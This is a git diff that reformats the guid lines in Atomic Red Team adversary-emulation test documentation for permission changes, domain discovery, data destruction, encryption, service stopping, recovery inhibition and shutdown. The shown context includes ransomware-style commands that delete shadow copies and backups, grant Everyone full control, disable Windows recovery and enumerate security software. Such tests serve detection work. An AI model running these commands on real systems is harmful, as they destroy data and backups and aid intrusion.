## Atomic Test #4 - WMIC bypass using remote XSL file - -auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b - Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** 7f5be499-33be-4129-a560-66021f379b9b + + + #### Inputs: diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index 3c8a6061..d39205df 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md @@ -16,16 +16,18 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
## Atomic Test #1 - WINWORD Remote Template Injection - -auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d - Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm Executes the code specified within the .dotm template. Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** 1489e08a-82c7-44ee-b769-51b72d03521d + + + #### Inputs: diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 3091fc0d..bbef7697 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -22,14 +22,16 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as
## Atomic Test #1 - Take ownership using takeown utility - -auto_generated_guid: 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 - Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will be displayed for the folder and each file inside of it. + **Supported Platforms:** Windows +**auto_generated_guid:** 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 + + + #### Inputs: @@ -68,15 +70,17 @@ echo T1222.001_takeown2 >> #{file_folder_to_own}\T1222.001_takeown2.txt
## Atomic Test #2 - cacls - Grant permission to specified user or group recursively - -auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 - Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied" is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a8206bcc-f282-40a9-a389-05d9c0263485 + + + #### Inputs: @@ -116,14 +120,16 @@ echo T1222.001_cacls2 >> #{file_or_folder}\T1222.001_cacls2.txt
## Atomic Test #3 - attrib - Remove read-only attribute - -auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 - Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty. + **Supported Platforms:** Windows +**auto_generated_guid:** bec1e95c-83aa-492e-ab77-60c71bbd21b0 + + + #### Inputs: @@ -164,14 +170,16 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #4 - attrib - hide file - -auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c - Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file. + **Supported Platforms:** Windows +**auto_generated_guid:** 32b979da-7b68-42c9-9a99-0e39900fc36c + + + #### Inputs: @@ -218,16 +226,18 @@ echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style - -auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 - Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **icacls "C:\*" /grant Everyone:F /T /C /Q** However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to "C:\*" if you prefer. + **Supported Platforms:** Windows +**auto_generated_guid:** ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 + + + #### Inputs: diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index d433f301..7d70fc6e 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -30,13 +30,15 @@ Adversarial may use these commands to make themselves the owner of files and dir
## Atomic Test #1 - chmod - Change file or folder mode (numeric mode) - -auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135 - Changes a file or folder's permissions using chmod and a specified numeric mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 34ca1464-de9d-40c6-8c77-690adf36a135 + + + #### Inputs: @@ -62,13 +64,15 @@ chmod #{numeric_mode} #{file_or_folder}
## Atomic Test #2 - chmod - Change file or folder mode (symbolic mode) - -auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 - Changes a file or folder's permissions using chmod and a specified symbolic mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** fc9d6695-d022-4a80-91b1-381f5c35aff3 + + + #### Inputs: @@ -94,13 +98,15 @@ chmod #{symbolic_mode} #{file_or_folder}
## Atomic Test #3 - chmod - Change file or folder mode (numeric mode) recursively - -auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 - Changes a file or folder's permissions recursively using chmod and a specified numeric mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ea79f937-4a4d-4348-ace6-9916aec453a4 + + + #### Inputs: @@ -126,13 +132,15 @@ chmod #{numeric_mode} #{file_or_folder} -R
## Atomic Test #4 - chmod - Change file or folder mode (symbolic mode) recursively - -auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f - Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0451125c-b5f6-488f-993b-5a32b09f7d8f + + + #### Inputs: @@ -158,13 +166,15 @@ chmod #{symbolic_mode} #{file_or_folder} -R
## Atomic Test #5 - chown - Change file or folder ownership and group - -auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 - Changes a file or folder's ownership and group information using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** d169e71b-85f9-44ec-8343-27093ff3dfc0 + + + #### Inputs: @@ -191,13 +201,15 @@ chown #{owner}:#{group} #{file_or_folder}
## Atomic Test #6 - chown - Change file or folder ownership and group recursively - -auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 - Changes a file or folder's ownership and group information recursively using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** b78598be-ff39-448f-a463-adbf2a5b7848 + + + #### Inputs: @@ -224,13 +236,15 @@ chown #{owner}:#{group} #{file_or_folder} -R
## Atomic Test #7 - chown - Change file or folder mode ownership only - -auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 - Changes a file or folder's ownership only using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 967ba79d-f184-4e0e-8d09-6362b3162e99 + + + #### Inputs: @@ -256,13 +270,15 @@ chown #{owner} #{file_or_folder}
## Atomic Test #8 - chown - Change file or folder ownership recursively - -auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 - Changes a file or folder's ownership only recursively using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 + + + #### Inputs: @@ -288,14 +304,16 @@ chown #{owner} #{file_or_folder} -R
## Atomic Test #9 - chattr - Remove immutable file attribute - -auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f - Remove's a file's `immutable` attribute using `chattr`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** e7469fe2-ad41-4382-8965-99b94dd3c13f + + + #### Inputs: diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md index 3d3deafa..9eac5248 100644 --- a/atomics/T1482/T1482.md +++ b/atomics/T1482/T1482.md @@ -18,14 +18,16 @@
## Atomic Test #1 - Windows - Discover domain trusts with dsquery - -auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f - Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role. + **Supported Platforms:** Windows +**auto_generated_guid:** 4700a710-c821-4e17-a3ec-9e4c81d6845f + + + @@ -45,15 +47,17 @@ dsquery * -filter "(objectClass=trustedDomain)" -attr *
## Atomic Test #2 - Windows - Discover domain trusts with nltest - -auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe - Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family. + **Supported Platforms:** Windows +**auto_generated_guid:** 2e22641d-0498-48d2-b9ff-c71e496ccdbe + + + @@ -85,14 +89,16 @@ echo Sorry RSAT must be installed manually
## Atomic Test #3 - Powershell enumerate domains and forests - -auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 - Use powershell to enumerate AD information. Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role. + **Supported Platforms:** Windows +**auto_generated_guid:** c58fbc62-8a62-489e-8f2d-3565d7d96f30 + + + @@ -137,14 +143,16 @@ Write-Host "Sorry RSAT must be installed manually"
## Atomic Test #4 - Adfind - Enumerate Active Directory OUs - -auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec + + + #### Inputs: @@ -181,14 +189,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #5 - Adfind - Enumerate Active Directory Trusts - -auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 15fe436d-e771-4ff3-b655-2dca9ba52834 + + + #### Inputs: diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 32873bd4..cdb01b5b 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -18,14 +18,16 @@ In cloud environments, adversaries may leverage access to delete cloud storage,
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete - -auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2 - Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in the powershell session along with other information about the file that was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 476419b5-aebf-4366-a131-ae3e8dae5fc2 + + + #### Inputs: @@ -66,14 +68,16 @@ Remove-Item $env:TEMP\SDelete.zip -Force
## Atomic Test #2 - macOS/Linux - Overwrite file with DD - -auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146 - Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 38deee99-fd65-4031-bec8-bfa4f9f26146 + + + #### Inputs: diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index bad8ac5a..293063cb 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -20,13 +20,15 @@ In cloud environments, storage objects within compromised accounts may also be e
## Atomic Test #1 - Encrypt files using gpg (Linux) - -auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 - Uses gpg to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 7b8ce084-3922-4618-8d22-95f996173765 + + + #### Inputs: @@ -70,13 +72,15 @@ which_gpg=`which gpg`
## Atomic Test #2 - Encrypt files using 7z (Linux) - -auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad - Uses 7z to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 53e6735a-4727-44cc-b35b-237682a151ad + + + #### Inputs: @@ -120,13 +124,15 @@ which_7z=`which 7z`
## Atomic Test #3 - Encrypt files using ccrypt (Linux) - -auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f - Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. + **Supported Platforms:** Linux +**auto_generated_guid:** 08cbf59f-85da-4369-a5f4-049cffd7709f + + + #### Inputs: @@ -172,13 +178,15 @@ if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; els
## Atomic Test #4 - Encrypt files using openssl (Linux) - -auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 - Uses openssl to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 142752dc-ca71-443b-9359-cf6f497315f1 + + + #### Inputs: diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index 4658beaa..a220070f 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -16,15 +16,17 @@ Adversaries may accomplish this by disabling individual services of high importa
## Atomic Test #1 - Windows - Stop service using Service Controller - -auto_generated_guid: 21dfb440-830d-4c86-a3e5-2a491d5a8d04 - Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** 21dfb440-830d-4c86-a3e5-2a491d5a8d04 + + + #### Inputs: @@ -53,15 +55,17 @@ sc.exe start #{service_name} >nul 2>&1
## Atomic Test #2 - Windows - Stop service using net.exe - -auto_generated_guid: 41274289-ec9c-4213-bea4-e43c4aa57954 - Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** 41274289-ec9c-4213-bea4-e43c4aa57954 + + + #### Inputs: @@ -90,16 +94,18 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #3 - Windows - Stop service by killing process - -auto_generated_guid: f3191b84-c38b-400b-867e-3a217a27795f - Stops a specified service killng the service's process. This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated." will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** f3191b84-c38b-400b-867e-3a217a27795f + + + #### Inputs: diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index c239f5bc..ad1339ef 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -29,18 +29,20 @@ A number of native Windows utilities have been used by adversaries to disable or
## Atomic Test #1 - Windows - Delete Volume Shadow Copies - -auto_generated_guid: 43819286-91a9-4369-90ed-d31fb4da2c01 - Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n confirmation prompt. Shadow copies can only be created on Windows server or Windows 8. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11) + **Supported Platforms:** Windows +**auto_generated_guid:** 43819286-91a9-4369-90ed-d31fb4da2c01 + + + @@ -72,14 +74,16 @@ vssadmin.exe create shadow /for=c:
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI - -auto_generated_guid: 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 - Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Shadow copies can only be created on Windows server or Windows 8. + **Supported Platforms:** Windows +**auto_generated_guid:** 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 + + + @@ -99,14 +103,16 @@ wmic.exe shadowcopy delete
## Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog - -auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c - Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session. + **Supported Platforms:** Windows +**auto_generated_guid:** 263ba6cb-ea2b-41c9-9d4e-b652dadd002c + + + @@ -126,14 +132,16 @@ wbadmin delete catalog -quiet
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair - -auto_generated_guid: cf21060a-80b3-4238-a595-22525de4ab81 - Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The operation completed successfully." will be displayed in the powershell session. + **Supported Platforms:** Windows +**auto_generated_guid:** cf21060a-80b3-4238-a595-22525de4ab81 + + + @@ -159,16 +167,18 @@ bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell - -auto_generated_guid: 39a295ca-7059-4a88-86f6-09556c1211e7 - Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil. Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution there may be no output displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 39a295ca-7059-4a88-86f6-09556c1211e7 + + + @@ -188,14 +198,16 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
## Atomic Test #6 - Windows - Delete Backup Files - -auto_generated_guid: 6b1dbaf6-cc8a-4ea6-891f-6058569653bf - Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try to delete files from around the system. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b1dbaf6-cc8a-4ea6-891f-6058569653bf + + + @@ -215,13 +227,15 @@ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\back
## Atomic Test #7 - Windows - wbadmin Delete systemstatebackup - -auto_generated_guid: 584331dd-75bc-4c02-9e0b-17f5fd81c748 - Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. + **Supported Platforms:** Windows +**auto_generated_guid:** 584331dd-75bc-4c02-9e0b-17f5fd81c748 + + + diff --git a/atomics/T1491.001/T1491.001.md b/atomics/T1491.001/T1491.001.md index 83a87102..805913fa 100644 --- a/atomics/T1491.001/T1491.001.md +++ b/atomics/T1491.001/T1491.001.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Replace Desktop Wallpaper - -auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 - Downloads an image from a URL and sets it as the desktop wallpaper. + **Supported Platforms:** Windows +**auto_generated_guid:** 30558d53-9d76-41c4-9267-a7bd5184bed3 + + + #### Inputs: diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 714d567e..23067507 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -14,14 +14,16 @@ Additionally, some cryptocurrency mining malware kills off processes for competi
## Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes - -auto_generated_guid: 904a5a0e-fb02-490d-9f8d-0e256eb37549 - This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 904a5a0e-fb02-490d-9f8d-0e256eb37549 + + + diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index 86ae11ca..f7cf9555 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -22,14 +22,16 @@ Hardware checks, such as the presence of the fan, temperature, and audio devices
## Atomic Test #1 - Detect Virtualization Environment (Linux) - -auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840 - systemd-detect-virt detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. + **Supported Platforms:** Linux +**auto_generated_guid:** dfbd1a21-540d-4574-9731-e852bd6fe840 + + + @@ -49,13 +51,15 @@ if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendo
## Atomic Test #2 - Detect Virtualization Environment (Windows) - -auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d - Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine + **Supported Platforms:** Windows +**auto_generated_guid:** 502a7dc4-9d6f-4d28-abf2-f0e84692562d + + + @@ -81,13 +85,15 @@ $error.clear()
## Atomic Test #3 - Detect Virtualization Environment (MacOS) - -auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09 - ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. + **Supported Platforms:** macOS +**auto_generated_guid:** a960185f-aef6-4547-8350-d1ce16680d09 + + + diff --git a/atomics/T1505.002/T1505.002.md b/atomics/T1505.002/T1505.002.md index 7e3386e2..e5ad87a3 100644 --- a/atomics/T1505.002/T1505.002.md +++ b/atomics/T1505.002/T1505.002.md @@ -12,14 +12,16 @@ Adversaries may register a malicious transport agent to provide a persistence me
## Atomic Test #1 - Install MS Exchange Transport Agent Persistence - -auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d - Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help + **Supported Platforms:** Windows +**auto_generated_guid:** 43e92449-ff60-46e9-83a3-1a38089df94d + + + #### Inputs: diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md index 1a3d7bbd..83933c8d 100644 --- a/atomics/T1505.003/T1505.003.md +++ b/atomics/T1505.003/T1505.003.md @@ -12,15 +12,17 @@ In addition to a server-side script, a Web shell may have a client interface pro
## Atomic Test #1 - Web Shell Written to Disk - -auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 - This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx + **Supported Platforms:** Windows +**auto_generated_guid:** 0a2ce662-1efa-496f-a472-2fe7b080db16 + + + #### Inputs: diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md index 230fdbef..97c326fc 100644 --- a/atomics/T1518.001/T1518.001.md +++ b/atomics/T1518.001/T1518.001.md @@ -24,16 +24,18 @@ Adversaries may also utilize cloud APIs to discover the configurations of firewa
## Atomic Test #1 - Security Software Discovery - -auto_generated_guid: f92a380f-ced9-491f-b338-95a991418ce2 - Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles and specific security software. + **Supported Platforms:** Windows +**auto_generated_guid:** f92a380f-ced9-491f-b338-95a991418ce2 + + + @@ -58,15 +60,17 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell - -auto_generated_guid: 7f566051-f033-49fb-89de-b6bacab730f0 - Methods to identify Security Software on an endpoint when sucessfully executed, powershell is going to processes related AV products if they are running. + **Supported Platforms:** Windows +**auto_generated_guid:** 7f566051-f033-49fb-89de-b6bacab730f0 + + + @@ -89,14 +93,16 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps (macOS) - -auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840 - Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. + **Supported Platforms:** macOS +**auto_generated_guid:** ba62ce11-e820-485f-9c17-6f3c857cd840 + + + @@ -116,14 +122,16 @@ ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefen
## Atomic Test #4 - Security Software Discovery - ps (Linux) - -auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 - Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. + **Supported Platforms:** Linux +**auto_generated_guid:** 23b91cd2-c99c-4002-9e41-317c63e024a2 + + + @@ -143,15 +151,17 @@ ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|
## Atomic Test #5 - Security Software Discovery - Sysmon Service - -auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 - Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed. + **Supported Platforms:** Windows +**auto_generated_guid:** fe613cf3-8009-4446-9a0f-bc78a15b66c9 + + + @@ -171,15 +181,17 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #6 - Security Software Discovery - AV Discovery via WMI - -auto_generated_guid: 1553252f-14ea-4d3b-8a08-d7a4211aa945 - Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software. + **Supported Platforms:** Windows +**auto_generated_guid:** 1553252f-14ea-4d3b-8a08-d7a4211aa945 + + + diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 3dbb4789..796e4ffc 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -16,14 +16,16 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
## Atomic Test #1 - Find and Display Internet Explorer Browser Version - -auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4 - Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 68981660-6670-47ee-a5fa-7e74806420a4 + + + @@ -43,14 +45,16 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
## Atomic Test #2 - Applications Installed - -auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b - Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b + + + @@ -71,13 +75,15 @@ Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uni
## Atomic Test #3 - Find and Display Safari Browser Version - -auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f - Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors + **Supported Platforms:** macOS +**auto_generated_guid:** 103d6533-fd2a-4d08-976a-4a598565280f + + + diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 1a223ec8..13cf9b66 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -28,13 +28,15 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
## Atomic Test #1 - Shutdown System - Windows - -auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 - This test shuts down a Windows system. + **Supported Platforms:** Windows +**auto_generated_guid:** ad254fa8-45c0-403b-8c77-e00b3d3e7a64 + + + #### Inputs: @@ -59,13 +61,15 @@ shutdown /s /t #{timeout}
## Atomic Test #2 - Restart System - Windows - -auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 - This test restarts a Windows system. + **Supported Platforms:** Windows +**auto_generated_guid:** f4648f0d-bf78-483c-bafc-3ec99cd1c302 + + + #### Inputs: @@ -90,13 +94,15 @@ shutdown /r /t #{timeout}
## Atomic Test #3 - Restart System via `shutdown` - macOS/Linux - -auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb - This test restarts a macOS/Linux system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 6326dbc4-444b-4c04-88f4-27e94d0327cb + + + #### Inputs: @@ -121,13 +127,15 @@ shutdown -r #{timeout}
## Atomic Test #4 - Shutdown System via `shutdown` - macOS/Linux - -auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de - This test shuts down a macOS/Linux system using a halt. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 4963a81e-a3ad-4f02-adda-812343b351de + + + #### Inputs: @@ -152,13 +160,15 @@ shutdown -h #{timeout}
## Atomic Test #5 - Restart System via `reboot` - macOS/Linux - -auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 - This test restarts a macOS/Linux system via `reboot`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 47d0b042-a918-40ab-8cf9-150ffe919027 + + + @@ -178,13 +188,15 @@ reboot
## Atomic Test #6 - Shutdown System via `halt` - Linux - -auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd - This test shuts down a Linux system using `halt`. + **Supported Platforms:** Linux +**auto_generated_guid:** 918f70ab-e1ef-49ff-bc57-b27021df84dd + + + @@ -204,13 +216,15 @@ halt -p
## Atomic Test #7 - Reboot System via `halt` - Linux - -auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e - This test restarts a Linux system using `halt`. + **Supported Platforms:** Linux +**auto_generated_guid:** 78f92e14-f1e9-4446-b3e9-f1b921f2459e + + + @@ -230,13 +244,15 @@ halt --reboot
